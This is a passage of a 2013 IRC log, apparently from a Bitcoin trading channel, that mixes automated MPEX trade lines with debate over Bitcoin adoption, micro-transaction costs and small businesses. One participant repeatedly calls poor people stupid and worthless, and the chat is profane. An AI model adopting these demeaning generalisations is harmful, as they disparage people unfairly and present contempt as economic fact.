09 05:57:55 [MPEX] [S.DICE] 900 @ 0.00468285 = 4.2146 BTC [+] Jan 09 06:22:33 [MPEX] [S.DICE] 650 @ 0.00466274 = 3.0308 BTC [-] Jan 09 06:26:55 [MPEX] [S.DICE] 800 @ 0.00466274 = 3.7302 BTC [-] Jan 09 06:26:57 [MPEX] [S.DICE] 350 @ 0.00465822 = 1.6304 BTC [-] Jan 09 06:26:58 [MPEX] [S.DICE] 450 @ 0.00465713 = 2.0957 BTC [-] Jan 09 06:28:46 [MPEX] [S.DICE] 50 @ 0.00468285 = 0.2341 BTC [+] Jan 09 06:28:48 [MPEX] [S.DICE] 450 @ 0.00468405 = 2.1078 BTC [+] Jan 09 06:28:49 [MPEX] [S.DICE] 282 @ 0.00469194 = 1.3231 BTC [+] Jan 09 06:28:50 [MPEX] [S.DICE] 1620 @ 0.00471475 = 7.6379 BTC [+] Jan 09 06:47:49 However, recent evidence suggests that Duqu may have been written in Object Oriented C (OO C) and compiled in Microsoft Visual Studio 2008. Jan 09 06:47:54 ahahaha omg that'd be the end all. Jan 09 06:48:19 [MPEX] [S.DICE] 1277 @ 0.00465713 = 5.9472 BTC [-] Jan 09 06:52:53 [MPEX] [S.DICE] 236 @ 0.00465713 = 1.0991 BTC [-] Jan 09 06:52:55 [MPEX] [S.DICE] 1070 @ 0.0046549 = 4.9807 BTC [-] Jan 09 06:55:56 argh I'm tired Jan 09 06:56:03 Once again no credit Jan 09 06:56:26 I have to learn to stop clicking on polimedia links. Jan 09 06:56:41 I don't know why but I can never read anything. Jan 09 06:56:49 http://forums.radioreference.com/community-announcements-news/257379-ask-rr-would-you-pay-subscription-bitcoins.html#post1889295 Jan 09 06:56:52 this is great. Jan 09 06:58:59 "If there were more robust security, in the bit coin infrastructure. I'd consider it, but as its setup now, not very likely. " Jan 09 06:59:38 "Bitcoins, in theory, could become the next universal currency. However, they are a pain to obtain (if you're not buying them outright) and the security model could use some work." Jan 09 06:59:46 i guess i'd better buy vitriol. Jan 09 07:01:03 "the security model" could use some work. Jan 09 07:02:23 what the fuck? Jan 09 07:02:26 yeah those morons want centralized shit and to reverse transactions. Because that's what they used to and they gave all their responsibilities to nanny governments Jan 09 07:02:47 its a very funny read, to me. Jan 09 07:03:08 this very entrenched western notion that everyone's entitled to an opinion. Jan 09 07:03:12 best thing for comedy. Jan 09 07:05:05 [MPEX] [S.DICE] 330 @ 0.00471475 = 1.5559 BTC [+] Jan 09 07:05:07 [MPEX] [S.DICE] 682 @ 0.00472303 = 3.2211 BTC [+] Jan 09 07:05:08 [MPEX] [S.DICE] 188 @ 0.00473903 = 0.8909 BTC [+] Jan 09 07:08:53 Someone should post something. Jan 09 07:09:11 post Jan 09 07:09:13 [MPEX] [S.DICE] 1312 @ 0.00473903 = 6.2176 BTC [+] Jan 09 07:09:13 [MPEX] [S.DICE] 650 @ 0.00474657 = 3.0853 BTC [+] Jan 09 07:09:15 [MPEX] [S.DICE] 38 @ 0.00474845 = 0.1804 BTC [+] Jan 09 07:09:20 Ok Jan 09 07:09:50 im gonna open a chocholate beer i think Jan 09 07:10:02 Hey... I want one. Jan 09 07:11:29 http://farm9.staticflickr.com/8010/7467168670_727523ac12_z.jpg Jan 09 07:16:35 woah Jan 09 07:16:40 this aint bad at all. Jan 09 07:24:31 http://healthland.time.com/2012/12/13/controversial-surgery-for-addiction-burns-away-brains-pleasure-center/ Jan 09 07:27:29 [MPEX] [S.MPOE] 9292 @ 0.00064183 = 5.9639 BTC [-] Jan 09 07:27:30 [MPEX] [S.MPOE] 4354 @ 0.00063645 = 2.7711 BTC [-] Jan 09 07:27:31 [MPEX] [S.MPOE] 1681 @ 0.0006363 = 1.0696 BTC [-] Jan 09 07:28:39 [MPEX] [S.DICE] 1300 @ 0.00471394 = 6.1281 BTC [-] Jan 09 07:28:40 [MPEX] [S.DICE] 700 @ 0.00468492 = 3.2794 BTC [-] Jan 09 07:28:41 [MPEX] [S.DICE] 1200 @ 0.00468424 = 5.6211 BTC [-] Jan 09 07:28:43 [MPEX] [S.DICE] 2300 @ 0.0046549 = 10.7063 BTC [-] Jan 09 07:33:28 Ok, well maybe we need to get some "stupidized" bitcoin explanation Jan 09 07:33:44 A bitcoin for dummies kind of thing... Jan 09 07:33:57 why Jan 09 07:34:50 yes. why ? Jan 09 07:35:12 Well because it needs to be super short for the short attention span of people inquiring about Bitcoins. Jan 09 07:35:24 Well although I guess we already have that. Jan 09 07:35:47 you don't get it. Jan 09 07:35:52 why do we want stupid people ? Jan 09 07:35:54 [MPEX] [S.DICE] 710 @ 0.00474845 = 3.3714 BTC [+] Jan 09 07:36:14 we will get them whether they want opr not Jan 09 07:36:39 because we want the stupid people money Jan 09 07:36:59 most of them dont really understand how fiat or credit cards actually "work" but use them daily, but feel they need to know every intracacy of bitcoin before using it Jan 09 07:37:01 shrug Jan 09 07:37:08 We don't want them, we want the business. Why is apple making so much money? For selling easy to use and elegant products. And they milk their customer base as much as possible. Jan 09 07:37:29 Graet yes, we will get them either way. they're worthless. why bother ? Jan 09 07:37:44 They don't need to even know that much about Bitcoin. Jan 09 07:37:56 apple is possibly the single worst comparison to btc Jan 09 07:38:01 thats what i said Namworld ;) Jan 09 07:38:03 we are exactly diametrically opposed in every single aspect Jan 09 07:38:14 simple example : satoshi is dead, btc benefits from it. jobs is dead, apple is doomed. Jan 09 07:39:39 satoshi is not dead Jan 09 07:39:48 if btc benefits from a dead satoshi, then let's kill him? Jan 09 07:40:06 kakobrekla prove it ? Jan 09 07:40:11 [MPEX] [S.DICE] 1000 @ 0.00474564 = 4.7456 BTC [-] Jan 09 07:40:27 Probably not that great a comparison. But they don't need to know that much about it. If they didn't have such misconception of Bitcoins, they wouldn't oppose using it and could use a third party processor. Yes, there's still the payment processor, but there's less fees and it doesn't support the archaic closed credit card/banking system. Jan 09 07:40:29 wanna bet Jan 09 07:40:38 JohnGalt2 im just making the point that in the sense jobs is dead (ie, no longer driving apple) so is satoshi Jan 09 07:40:53 Namworld their misconceptions are for the greater good. Jan 09 07:40:58 they don't belong mucking up bitcoin Jan 09 07:41:03 and no, we don't want their business, either. Jan 09 07:41:34 their business is very expensive. rape-them-in-the-ass corps like banks etc are very good at keeping their idiocy expensiveness low while turning a buck Jan 09 07:41:35 What impact does it make that they'd use Bitcoins? Jan 09 07:41:49 but the effort and expertise involved in doing this are much more than what's needed to make asics Jan 09 07:42:26 Namworld: A lot of the stupid people don't want to have fancy internet money without having a possibility to reverse transactions Jan 09 07:42:37 Ah, that. Jan 09 07:42:48 They're not used it to it because of their nanny governments Jan 09 07:43:12 they're expensive, it's simple. Jan 09 07:43:26 it costs to supply their needs more than they are capable of paying. Jan 09 07:43:40 [MPEX] [S.DICE] 902 @ 0.00474845 = 4.2831 BTC [+] Jan 09 07:43:41 [MPEX] [S.DICE] 700 @ 0.00475265 = 3.3269 BTC [+] Jan 09 07:43:42 [MPEX] [S.DICE] 500 @ 0.00475518 = 2.3776 BTC [+] Jan 09 07:43:44 [MPEX] [S.DICE] 2274 @ 0.00477726 = 10.8635 BTC [+] Jan 09 07:43:44 why do you think banks wouldn't take most poor people's accounts if they weren't legally forced to ? Jan 09 07:43:44 [MPEX] [S.DICE] 35624 @ 0.00478695 = 170.5303 BTC [+] Jan 09 07:44:31 I don't see that argument as valid. As the supplier, you set the price and service provided for it. Jan 09 07:44:35 ... Jan 09 07:44:40 I don't think every user needs to understand how bitcoin works entirely. I don't, I'm not interested in the IT stuff, I'm interested in the moneyz stuf Jan 09 07:44:46 !ticker s.dice Jan 09 07:44:47 [MPEX:S.DICE] 1day: 0.00449 / 0.004709 / 0.004787 (583698 shares, 2,748.64 BTC), 30day: 0.0014 / 0.00340446 / 0.0048 (13963747 shares, 47,539.11 BTC) Jan 09 07:44:54 ;;ticker Jan 09 07:44:55 That you take bitcoins or not, your local government could force you to provide services regardless. Jan 09 07:44:56 BTCUSD ticker | Best bid: 13.70001, Best ask: 13.72855, Bid-ask spread: 0.02854, Last trade: 13.70000, 24 hour volume: 32942.91842052, 24 hour low: 13.61100, 24 hour high: 13.87998, 24 hour vwap: 13.76016 Jan 09 07:45:02 what local government ? Jan 09 07:45:21 there's no government that's local to the internet. Jan 09 07:45:34 most of people driving cars dont know how internal combustion works. Jan 09 07:45:51 its same with anything thats more than a stick and a stone and many people use Jan 09 07:46:17 I'm not talking about internet only. Just various other services. Jan 09 07:46:21 exactly Jan 09 07:46:42 i guess this discussion became to vague to continue/ Jan 09 07:47:09 point remains. we don't want the average joe and his 3-9 dollar transaction. Jan 09 07:47:19 nobody does eitgher, but that's besides the point. we don't,. Jan 09 07:47:34 What if I sell 3-9 dollars thing? Jan 09 07:47:42 i dont care if joe comes or not, i just know he doenst have to know how it works to use it Jan 09 07:47:52 Namworld then bitcoin isn't for you. Jan 09 07:48:08 Yes, we do want Joe with his 3-9 dollarz. Bitcoin needs growth, maybe he'll buy more bitcoins after that Jan 09 07:48:16 Why? Jan 09 07:48:31 because, Namworld, the costs of administering this sort of business exceed your profits from doing it. Jan 09 07:48:39 in simple terms : you can't afford btc. Jan 09 07:49:12 depends Jan 09 07:49:32 in RL the biggest cost of small bills are the billing itself Jan 09 07:49:37 it doesn't really depend. we have centuries of accumulated experience in trade. by now things are pretty well known Jan 09 07:49:44 [MPEX] [S.DICE] 400 @ 0.00478695 = 1.9148 BTC [+] Jan 09 07:49:48 kakobrekla yes, that is true. Jan 09 07:50:01 But it does not exceed the costs... otherwise capitalism wouldn't work because pretty much nothing brings any profit? Jan 09 07:50:28 Details 2013-01-09 01:51:31 lessthan 16000 de2012c9 3148068f 1HbHbFK CONFIRMED 435.00000000 LOSE 2.17450000 41970 Details 2013-01-09 01:50:43 lessthan 16000 d463f567 faa9a2d8 19LQ1zn CONFIRMED 435.00000000 LOSE 2.17450000 53146 Details 2013-01-09 01:49:33 lessthan 16000 f3d916d3 c4273fff 1Bw9MTr CONFIRMED 435.00000000 LOSE 2.17450000 52002 Details 2013-01-09 01:48:04 lessthan 16000 881eda89 5a2d111b 1Fh2Rjd CONFIRMED 327.680 Jan 09 07:50:37 sory Jan 09 07:50:42 that's an unwarranted generalisation. Jan 09 07:51:25 Well than all consumerism in america is unprofitable if the 3-9 dollar transaction exceeds profits. Jan 09 07:52:09 That bottle of Coke that costs 10 cent to make is not profitable to sell under 1$ and Coke doesn't earn any revenue. Jan 09 07:52:17 no. Jan 09 07:52:31 the 3-9 transactions work on an economy of scale model Jan 09 07:52:44 if you aggregate one billion of them you can squeeze a little profit Jan 09 07:52:52 but you lack all the many tools that the banks use to turn this green. Jan 09 07:53:33 and Bitcoin is designed to further help the profit margin. The bitcoin is designed to facilitate micro-transactions. Jan 09 07:53:45 the fact that it is designed to do it does not mean you are the one to do it. Jan 09 07:53:46 [MPEX] [S.DICE] 150 @ 0.00474564 = 0.7118 BTC [-] Jan 09 07:53:46 that is true, yet i have seen bitcoin margins so ridiculusly high, you dont need volume Jan 09 07:53:47 [MPEX] [S.DICE] 291 @ 0.00467378 = 1.3601 BTC [-] Jan 09 07:53:47 [MPEX] [S.DICE] 556 @ 0.0046549 = 2.5881 BTC [-] Jan 09 07:53:51 For which transaction fees would be too large for 1-5$ transactions. Jan 09 07:54:05 this is the asic argument all over again Jan 09 07:54:06 why are the margins like they are, thats another question Jan 09 07:54:11 with at least 2 anwers Jan 09 07:54:13 the fact that asic fab plants are designed to make custom chips Jan 09 07:54:18 does not mean bfl will be making asics. Jan 09 07:54:55 in principle, for every degree of magnitude the transaction goes down, your fixed costs go up one and a half. Jan 09 07:55:18 you need to be a multi-billion corp to process sub 10 dollar transactions effectually. Jan 09 07:55:37 in RL ya Jan 09 07:55:46 in bitcoin it is atm even worse Jan 09 07:56:05 note, im not saying that by 2050 or w/e all these fabulous economies of scale baked in by design won't be working full bore Jan 09 07:56:11 to _process_ it doesnt cost anything Jan 09 07:56:23 all im saying is that the average small biz does not find itself in a position to do this. Jan 09 07:56:44 i see what you mean Jan 09 07:57:02 90%+ of all small businesses that tried bitcoin discovered this on their own timeand dime Jan 09 07:57:21 this obviously is unavoidable, seeing how they couldn't afford to hire me to tell them this, and wouldn't have made sense of it anyway. Jan 09 07:57:21 Well then we also don't need small gamblers on SatoshiDice or BitVPS is not profitable with it's sub 10 dollar plans. So are small sellers accepting bitcoins and etc, online or not. Jan 09 07:57:23 but bitcoin is small, still. Jan 09 07:57:39 not small, tiny. Jan 09 07:57:48 S.DICE benefits from small gamblers Jan 09 07:57:49 Namworld the hosting industry may be the one single place where my above judgements may be shown mistaken Jan 09 07:57:56 lowers variance Jan 09 07:57:56 because of very speciffic characteristics. Jan 09 07:58:12 Buglouse blockchain suffers from small gambers on sd Jan 09 07:58:13 and incremental transaction costs are near zero Jan 09 07:58:14 and s.dice takes small gamblers because it's very easy to provide the service to them. Jan 09 07:58:15 :p Jan 09 07:58:16 Well it's indeed quite mostly automation and all online. Jan 09 07:58:17 fuck Jan 09 07:58:17 it doesn't deliver anything Jan 09 07:58:18 Bugpowder Jan 09 07:58:23 srs whats with this bug nicks Jan 09 07:58:23 3-9$ transactions would work fine for small takeaway or coffee shops Jan 09 07:58:26 no gambler can pick up the phone and complain about damaged deliveries. Jan 09 07:58:30 or want to return Jan 09 07:58:47 But that's exactly the problem that would get solved without such opposition. Bitcoin could get lower transaction costs with easier availability through more demand/offer. Jan 09 07:58:51 60 BTC / mo fixed cost Jan 09 07:58:55 JohnGalt it has been proven not to work > 20 times so far. Jan 09 07:58:57 it has economy of scale Jan 09 07:58:59 hello Jan 09 07:59:03 hi. Jan 09 07:59:36 :) Jan 09 07:59:37 using phones to pay in bitcoins wuld be feasible for a much lower fee than the credit card conglomerate/payment processors are trying to offer. Jan 09 07:59:55 Which would allow even small shop to process smaller transactions with more profitability. Jan 09 08:00:07 Agreed that it's not currently feasible. Jan 09 08:00:09 you're stubornly focusing on irrelevant detail. Jan 09 08:00:18 it doesn't matter what the payment "costs" in your estimation. Jan 09 08:00:30 what matters is how much dealing with people ACTUALLY costs. Jan 09 08:00:35 dealing with poor people is very expensive. Jan 09 08:00:45 handling small transactions is very expensive. Jan 09 08:01:05 Dealing with someone who enters and at the register pays for something is fast and inexpensive... Jan 09 08:01:14 even if the person is poor... Jan 09 08:01:20 a well. Jan 09 08:01:23 or pays for not much. Jan 09 08:01:35 it's right in front of your eyes dude. Jan 09 08:01:40 they're not poor as an accident of fate Jan 09 08:01:44 they're poor because they're stupid. Jan 09 08:01:58 that means they will introduce friction Jan 09 08:02:07 that further means you will be spending your time doing the impossible. Jan 09 08:02:11 a wait Jan 09 08:02:16 holy shit Jan 09 08:02:16 such as, for instance, explaining to those idiots on that article quoted why they're wrong Jan 09 08:02:21 in such terms as they'd be able to grasp Jan 09 08:02:26 That set of losses I posted Jan 09 08:02:28 this feat costs exponentially more the dumber they are. Jan 09 08:02:45 >>See that picture ? The poor schmucks in that picture are likely more intelligent, more dilligent and generally better human beings than Gobry. Unfortunately for them, they didn’t have the obscene good fortune of being born in this part of the world. As a result, they’re dicking around packing mud while this worthless fuckwit goes about farting self-delusions of “strategic global Jan 09 08:02:45 issues” and whatnot. Jan 09 08:02:53 was from one guy starting with a 0.01BTC bet on less than 16000, and doubling it every loss Jan 09 08:03:04 until he lost 2000 BTC Jan 09 08:03:08 and gave up Jan 09 08:03:14 ahahah nowai Bugpowder ? Jan 09 08:03:20 i guess deposit soon ? Jan 09 08:03:30 Yes. But as far as I know most most brick and mortar business have to do that bitcoin or not and while not all manage to succeed at it, many remain in business, wether small or large. Jan 09 08:03:44 no. they do not manage to stay in business. Jan 09 08:03:57 there's a reason for chains and franchises and payment processors being centralised Jan 09 08:03:59 and so forth. Jan 09 08:04:02 mircea_popescu are those chaps unfortunate or stupid? Jan 09 08:04:22 kakobrekla the problem with macroeconomy is that those terms aren't distinct. Jan 09 08:04:57 think in terms of girl looking for a husband. does she care if he;'s lucky or smart ? Jan 09 08:04:59 The reason is that it's more cost effective and branding brings clients. Jan 09 08:05:02 she doesn't. she cares if he's gonna feed her babies. Jan 09 08:05:13 no namworld. the reason is that people can't afford to stay in business Jan 09 08:05:24 under the crushing pressure of the huge costs of the 3-9 dollars transaction. Jan 09 08:05:37 [MPEX] [S.DICE] 900 @ 0.0046549 = 4.1894 BTC [-] Jan 09 08:05:45 ... Jan 09 08:06:41 but those costs are very close for a chain convenience store or a personally owned one, for example... there's plenty of non-affiliated small businesses handling small transactions left. Jan 09 08:06:55 not at all. Jan 09 08:07:01 the chain can tell customers to go get fucked. Jan 09 08:07:22 which it regularly does. Jan 09 08:07:30 go try and complain to your phone company, as a fuine example. Jan 09 08:07:59 Well I can't speak for Romania. But I see small businesses staying around and in all apparence, doing well. Jan 09 08:08:23 you see small service businesses staying around. Jan 09 08:08:33 and even those have been taking a beating of horror past 10-20 years. Jan 09 08:08:54 small businesses are small businesses cause they arent large businesses Jan 09 08:09:20 Just as I see small providers competing with larger corps with better services. They still turn a profit and stick around. Jan 09 08:09:34 small businesses are either a) going bankrupt (happens to 90% ish of them) or else in a new niche. Jan 09 08:09:38 It's harder and there's less margins. It's just not impossible. Jan 09 08:11:00 im sorry, you must be from an alternate universe. why would i be doing something at a competitive disadvantage ? Jan 09 08:11:07 if it's harder and it pays less i'm out of there. Jan 09 08:11:26 Because if you work for the corporation, you get paid even less. Jan 09 08:11:33 lol. Jan 09 08:11:52 you know, business is business, not survival. Jan 09 08:11:56 it has to earn. Jan 09 08:12:08 im not looking for a way to employ myself. Jan 09 08:12:34 Your margins are lower for the business, but the profit is better for the owner. As for employees, they're probably paid a similar pay. Jan 09 08:12:49 the owner/business distinction is spurious. Jan 09 08:13:26 Well there's incentive as to create and keep the small business running as long as that advantage for the owner exists. Jan 09 08:13:36 maybe. Jan 09 08:13:52 in general it's irrational to expend your resources at a comparative disadvantage. Jan 09 08:13:53 That you have a 20% margin and your large competitor has 30% matters not if you get enough sales at 20% that you get a nice yearly earning. Jan 09 08:14:24 The owners just has to work for it. But I think that's a work/reward ratio that's still attractive. Jan 09 08:14:27 the more profitable one will crush you Jan 09 08:14:29 it absolutely matters lol Jan 09 08:14:37 they will invest more Jan 09 08:14:41 they will destroy you Jan 09 08:14:54 they might destroy you even if you have 10x their margins Jan 09 08:14:55 otherwise they will be destroyed Jan 09 08:15:01 but to go into this when they hold the upper hand is folly. Jan 09 08:16:03 It is folly, maybe. Many fails on that path. Most small businesses go bankrupt indeed. But some succeed. Jan 09 08:16:48 That this percentage is quite low matters not. It remains an incentive to exploit any opportunity. Jan 09 08:17:07 Bitcoins could help by making small transactions more accessible at lower costs. Jan 09 08:17:37 they will make more expensive customers accessible,w hich will sink you. Jan 09 08:20:14 Well if it hasn't sunk small convenience stores and shops/restaurants, and still don't, I don't see why that would change anything. Jan 09 08:20:28 They already cater to the most "expensive" customers. Jan 09 08:20:56 the most expensive customer in the world is the guy buying a 3-9 dollar trinket over the internet. Jan 09 08:21:27 Well I don't purport bitcoins would be good for users buying online for small amounts. Jan 09 08:22:02 I say they would in lieu of credit card for small transaction in shops. Jan 09 08:22:37 not really. it meets nobody;s needs. Jan 09 08:22:46 [MPEX] [S.DICE] 675 @ 0.00475997 = 3.213 BTC [+] Jan 09 08:22:47 [MPEX] [S.DICE] 525 @ 0.00478695 = 2.5131 BTC [+] Jan 09 08:23:01 Not right now. Jan 09 08:23:09 merchant wants ensured funds, customer wants reversible transaction and balance protection Jan 09 08:23:20 cc companies offer all these, and rely on the state to police it all. Jan 09 08:23:38 bitcoin has not the subsidy of the state, and can't offer either safety for the merchant or reversibility for the customer. Jan 09 08:23:51 Ah, I suppose. Jan 09 08:23:59 bitcoin exists so a guy in china can be paid for 10 containers of tvs Jan 09 08:24:08 not so that fifty people can buy a coffee each. Jan 09 08:24:15 [MPEX] [S.DICE] 890 @ 0.00478695 = 4.2604 BTC [+] Jan 09 08:24:27 Well agreed that as a vehicle for transfer of value for large transactions, bitcoins would be ideal. Jan 09 08:25:10 right. Jan 09 08:25:17 once it becomes the standard there it will trickle down Jan 09 08:25:24 historically the cheque was used by the rich Jan 09 08:25:29 it eventually became standard for everyone. Jan 09 08:25:37 historically electronic payments were bank-only. Jan 09 08:25:44 then the credit card made them ubiqutous. Jan 09 08:25:53 bitcoins for the masses happens in a decade or two. Jan 09 08:26:05 Well I'm not saying right away bitcoins should be used in shops... Jan 09 08:26:11 many people are tho Jan 09 08:26:19 and keep fucking over small business owners and customers. Jan 09 08:26:31 I don't believe we're anywhere near that level. Jan 09 08:27:18 I'm just saying misconception and bad press hinders bitcoins adoption and that they would prove useful given the right tools. Jan 09 08:27:19 obviously once we build scale and capital and knowhow we'll be able to dislodge larger and larger chunks Jan 09 08:27:35 but for now the focus on small busionesses is simply the tell-talle effect of incompetence and impotence in the bitcoin camp. Jan 09 08:27:51 people don't know the people they should be talking to, don't know how to find them, don't dare approach them Jan 09 08:27:56 so they pester barristas instead. Jan 09 08:29:20 Ah. I merely wanted that misconception be cleared so there's less opposition. Better public view/demand for something increase the chance the people that matter will hear about, either through family or other connections. Jan 09 08:29:42 not at all. Jan 09 08:29:48 it's best if common people loathe btc for now. Jan 09 08:30:18 just as it was best for mpex that all the glbse idjits hated it Jan 09 08:30:56 I'm not sure what advantage that has. Jan 09 08:31:09 They can't enter anyway Jan 09 08:31:18 keeps the expensive people out and so saves our resources. Jan 09 08:31:59 They can't pay the entry fee anyway... Jan 09 08:32:23 If they want something they can't, they talk more about it than something they'd dismiss. Jan 09 08:32:38 [MPEX] [S.DICE] 937 @ 0.0046549 = 4.3616 BTC [-] Jan 09 08:32:40 [MPEX] [S.DICE] 113 @ 0.00464997 = 0.5254 BTC [-] Jan 09 08:32:48 Which can attracts the attention of the people you want. Jan 09 08:32:56 well bitcoin's problem is that it doesn't have who to put an entrance fee. Jan 09 08:34:07 [MPEX] [S.DICE] 1318 @ 0.00464997 = 6.1287 BTC [-] Jan 09 08:35:17 [MPEX] [S.DICE] 1400 @ 0.00478699 = 6.7018 BTC [+] Jan 09 08:53:16 You allow withdrawals as low as 0.0005 BTC? Isn't that catering to small transactions? Jan 09 08:53:52 I think I could hardly bother with anything less than 1 BTC. Jan 09 08:54:18 o, that's a trap Jan 09 08:54:24 mpex only processes deposits. Jan 09 08:55:45 Oh, I'm sorry for the misunderstanding, I probably hallucinated my previous withdrawed bitcoins. Have a good day sir. Jan 09 08:56:15 lol Jan 09 08:57:12 But, in all seriousness, I just made a 40 BTC withdrawal request. Jan 09 08:58:01 It seems someone is selling my debt under par value and I wish to purchase it. Jan 09 09:00:15 The contract says upon request I'll pay par value and the email is right there along the contract but no one seems to bother requesting. Quite odd. Jan 09 09:00:54 [MPEX] [S.DICE] 450 @ 0.00478378 = 2.1527 BTC [-] Jan 09 09:02:56 done. Jan 09 09:04:01 http://bitbet.us/bet/66/ anyone know what this is ? Jan 09 09:04:05 I've had the notice before you notified here. I do like the confirmation speed. Jan 09 09:04:16 Thank you for the prompt service. Jan 09 09:06:22 hehe my pleasure. Jan 09 09:17:40 Well, now I even get to know who put those under par on the market... Jan 09 09:18:18 Hmm... Jan 09 09:18:19 http://www.morgenthaler.com/home/contact-us/ Jan 09 09:18:22 lmao idiots Jan 09 09:18:54 [MPEX] [S.DICE] 1689 @ 0.00478699 = 8.0852 BTC [+] Jan 09 09:19:35 oh wow... Jan 09 09:20:33 and these people have like 1bn in assets Jan 09 09:20:38 can't get a motherfucking link right. Jan 09 09:21:56 Okay... they manage 1 billion... that website is so basic... They probably pay a premium for the website and they manage to screw up the contact us link... Jan 09 09:22:37 and the page is screwed up. Jan 09 09:22:52 va firms have possibly the worst websites Jan 09 09:22:58 Things get misaligned. Seems like no one thought of the poor contact page. Jan 09 09:23:08 and most of them are in technology/it Jan 09 09:24:58 http://www.morgenthaler.com/ventures/contact/ Jan 09 09:25:12 Well the contact page from either sub-section works. At least. Jan 09 09:25:22 Just not from the main page =/ **** BEGIN LOGGING AT Wed Jan 9 20:50:22 2013 Jan 09 21:01:04 [MPEX] [S.DICE] 1000 @ 0.00476739 = 4.7674 BTC [+] Jan 09 21:06:18 [MPEX] [S.DICE] 1000 @ 0.00476739 = 4.7674 BTC [+] Jan 09 21:17:09 [MPEX] [S.DICE] 983 @ 0.00476739 = 4.6863 BTC [+] Jan 09 21:17:10 [MPEX] [S.DICE] 17 @ 0.00477127 = 0.0811 BTC [+] Jan 09 21:19:48 [MPEX] [S.DICE] 483 @ 0.00477127 = 2.3045 BTC [+] Jan 09 21:19:50 [MPEX] [S.DICE] 700 @ 0.00478628 = 3.3504 BTC [+] Jan 09 21:19:51 [MPEX] [S.DICE] 2426 @ 0.00478919 = 11.6186 BTC [+] Jan 09 21:20:46 !ticker s.dice Jan 09 21:20:48 [MPEX:S.DICE] 1day: 0.00449 / 0.00468334 / 0.00478919 (362534 shares, 1,697.87 BTC), 30day: 0.0014 / 0.00341561 / 0.0048 (14083889 shares, 48,105.09 BTC) Jan 09 21:23:46 ART? Jan 09 21:24:48 http://www.youtube.com/watch?v=RWF86D_UNxc Jan 09 21:25:57 lol Jan 09 21:29:02 EskimoBob: >riot Jan 09 21:29:03 lol Jan 09 21:30:05 lol Jan 09 21:32:53 Diablo-D3, do you watch KHL? we should set up some bets, too Jan 09 21:33:17 i don't watch it much, but i saw todays' match in a gym so it occurred it to me Jan 09 21:33:29 what's khl ? Jan 09 21:33:40 continental hockey league Jan 09 21:33:43 o Jan 09 21:33:53 ex-USSR + czechoslovakia Jan 09 21:33:53 mod6 was into hockey irc Jan 09 21:34:32 [MPEX] [S.DICE] 1900 @ 0.00478919 = 9.0995 BTC [+] Jan 09 21:36:31 ahh, yeah :) Jan 09 21:36:32 [MPEX] [S.DICE] 5000 @ 0.00478919 = 23.946 BTC [+] Jan 09 21:37:12 the NHL is back from its lockout too fwiw. Just in time for BitBet :] Jan 09 21:41:01 [MPEX] [S.DICE] 1200 @ 0.00476061 = 5.7127 BTC [-] Jan 09 21:41:06 >D Jan 09 21:42:38 i/a Jan 09 21:46:04 [MPEX] [S.DICE] 1087 @ 0.00478919 = 5.2058 BTC [+] Jan 09 21:46:08 how do you get to the market on bitfunder Jan 09 21:50:00 https://bitcointalk.org/index.php?topic=135574.0 Jan 09 21:50:13 lets see what comes out of this Jan 09 21:51:24 [MPEX] [S.DICE] 3800 @ 0.00476061 = 18.0903 BTC [-] Jan 09 21:51:25 [MPEX] [S.DICE] 653 @ 0.0047606 = 3.1087 BTC [-] Jan 09 21:54:20 flowers for mpoe-pr, what else :) Jan 09 21:55:27 poor thing. no one pays her attention it seems Jan 09 21:55:49 i thought it was a good round up Jan 09 21:56:39 my bet is on crickets Jan 09 21:56:43 haha Jan 09 21:56:48 they're just too afraid of her by now. Jan 09 21:57:34 i hope she doesn't scare journalists away Jan 09 21:57:52 someone needs to set these guys straight. and she's been spot on for over a year. Jan 09 21:57:55 can you scare journalists away ? Jan 09 21:58:14 moreover. if you scare some dood away, could he have been a journalist ? Jan 09 21:58:17 im sure I saw a market page on bitfunder yesterday Jan 09 21:58:20 but now.. Jan 09 21:58:25 was I mistaken? Jan 09 21:58:37 or do I need more coffee Jan 09 21:59:27 dub, why? yes there's more stuff there now. Jan 09 21:59:59 link? Jan 09 22:00:12 all I see is an asset list Jan 09 22:01:20 you think there was more yest? Jan 09 22:01:51 the asset list is the market page? its just a list of btc addresses with stock balances Jan 09 22:02:52 I must be mistaking it with another site Jan 09 22:11:41 [MPEX] [S.DICE] 850 @ 0.00477962 = 4.0627 BTC [+] Jan 09 22:12:47 nearly positivie it was bitfunder Jan 09 22:12:59 maybe its a browser problem Jan 09 22:15:46 are there any sites not in the topic? Jan 09 22:16:49 kakobrekla: assbot isnt showing havelock trades Jan 09 22:20:19 [MPEX] [S.DICE] 150 @ 0.00477962 = 0.7169 BTC [+] Jan 09 22:20:20 [MPEX] [S.DICE] 350 @ 0.0047606 = 1.6662 BTC [-] Jan 09 22:23:41 dub im sure there must be Jan 09 22:24:01 [MPEX] [S.DICE] 1015 @ 0.00478699 = 4.8588 BTC [+] Jan 09 22:24:03 [MPEX] [S.DICE] 35 @ 0.00478919 = 0.1676 BTC [+] Jan 09 22:24:12 pretty sure I looked at it last night Jan 09 22:24:33 but I can only find news|asset list|t&c Jan 09 22:25:05 if it is there, its very well hidden Jan 09 22:38:15 yeah tbqh accurate or not its hard to see how the post would produce anything but negative PR Jan 09 22:38:27 [MPEX] [S.DICE] 1337 @ 0.00478919 = 6.4031 BTC [+] Jan 09 22:38:42 1337 dice yo Jan 09 22:39:58 dub the gorby thing ? Jan 09 22:40:22 "Can someone with a seat on the board say if they're getting more update than that ? Jan 09 22:40:22 Nope, so far board members do not have more info than what is provided in this thread." Jan 09 22:40:25 whoopdedoo. Jan 09 22:40:50 mircea_popescu: the feet kissing post Jan 09 22:41:44 o Jan 09 22:42:05 heh. who exactly is big enough to do "negative PR" ? Jan 09 22:42:09 its seldom productive to rub peoples faces in their own shit, expecially a bunch of nobodies Jan 09 22:42:20 in general that's true. Jan 09 22:42:41 here it's important, i think, because otherwise the flavour of the entire thing slowly turns to shit. Jan 09 22:44:19 [MPEX] [S.DICE] 230 @ 0.0047606 = 1.0949 BTC [-] Jan 09 22:44:19 [MPEX] [S.DICE] 620 @ 0.0047341 = 2.9351 BTC [-] Jan 09 22:52:56 "Chinese new year or not this a bad time of year to rely on devices that rely so heavily on parts from countries that celebrate the near years and the up coming spring festival." Jan 09 22:53:17 pity asicminer didn't have its shares up, it'd have made a killing. Jan 09 22:53:27 [MPEX] [S.DICE] 180 @ 0.0047341 = 0.8521 BTC [-] Jan 09 22:53:29 [MPEX] [S.DICE] 612 @ 0.00470933 = 2.8821 BTC [-] Jan 09 23:02:26 [MPEX] [S.DICE] 746 @ 0.00470933 